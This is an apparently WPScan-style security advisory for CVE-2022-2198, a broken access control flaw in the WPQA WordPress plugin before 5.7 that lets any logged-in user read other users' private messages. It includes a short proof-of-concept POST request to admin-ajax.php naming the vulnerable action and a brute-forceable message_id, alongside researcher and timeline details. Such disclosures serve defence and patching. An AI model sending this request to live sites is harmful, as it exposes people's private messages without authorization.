WPQA < 5.7 – Subscriber+ Private Message Disclosure via IDOR | CVE 2022-2198 | Plugin Vulnerabilities

Description

The plugin which is a companion plugin to the Hilmer and Discy themes, does not check authorization before displaying private messages, allowing any logged in user to read other users private message using the message id, which can easily be brute forced.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: <any user valid cookie>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 42

action=wpqa_message_reply&message_id=43889

Here you can view my private message using message_id=43889

https://youtu.be/xKKouQ8cUgQ

Affects Plugins

Fixed in 5.7

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Bikram kharal

Submitter

Bikram kharal

Submitter website

https://bikramkharal.com.np/

Submitter twitter

Verified

Yes

WPVDB ID

867248f2-d497-4ea8-b3f8-0f2e8aaaa2bd

Timeline

Publicly Published

2022-08-01 (about 3 years ago)

Added

2022-08-01 (about 3 years ago)

Last Updated

2023-04-30 (about 2 years ago)

Other

Published

Title

Published

2024-11-20

Title

If-So Dynamic Content Personalization < 1.9.2.2 - Authenticated (Contributor+) Post Disclosure

Published

2025-07-31

Title

Service Finder Bookings < 6.1 - Authentication Bypass via User Switch Cookie

Published

2025-03-07

Title

FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel < 2.4.30 - Insecure Direct Object Reference to Authenticated (Custom+) Arbitrary Post/Page Updates

Published

2023-01-17

Title

WP FullCalendar < 1.5 - Unauthenticated Arbitrary Post Access

Published

2024-09-24

Title

REST API TO MiniProgram < 4.7.6 - Unauthenticated Arbitrary User Email Update and Privilege Escalation via Account Takeover